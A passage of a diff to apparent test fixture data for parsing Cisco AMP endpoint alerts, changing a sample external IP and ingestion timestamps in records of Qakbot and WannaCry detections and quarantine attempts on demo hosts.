Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -666,7 +666,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -720,7 +720,7 @@ "8cf0ca99a8f5019d8583133b9a9379299c45470c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -737,8 +737,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798670499Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":214000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", + "ingested": "2021-12-09T13:35:47.010679800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":214000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -760,7 +760,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -810,7 +810,7 @@ "8cf0ca99a8f5019d8583133b9a9379299c45470c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -827,8 +827,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798672750Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", + "ingested": "2021-12-09T13:35:47.010685100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -850,7 +850,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -891,7 +891,7 @@ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -901,8 +901,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798675025Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "ingested": "2021-12-09T13:35:47.010690300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -922,7 +922,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -963,7 +963,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -973,8 +973,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798677505Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:47.010695900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -994,7 +994,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1039,7 +1039,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1049,8 +1049,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798679795Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:47.010701200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1070,7 +1070,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1115,7 +1115,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1125,8 +1125,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798682063Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:47.010706800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1146,7 +1146,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1191,7 +1191,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1201,8 +1201,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798684293Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:47.010712300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648155", "kind": "alert", "action": "Retrospective Quarantine", @@ -1222,7 +1222,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1265,7 +1265,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1279,8 +1279,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798686588Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:47.010717500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a5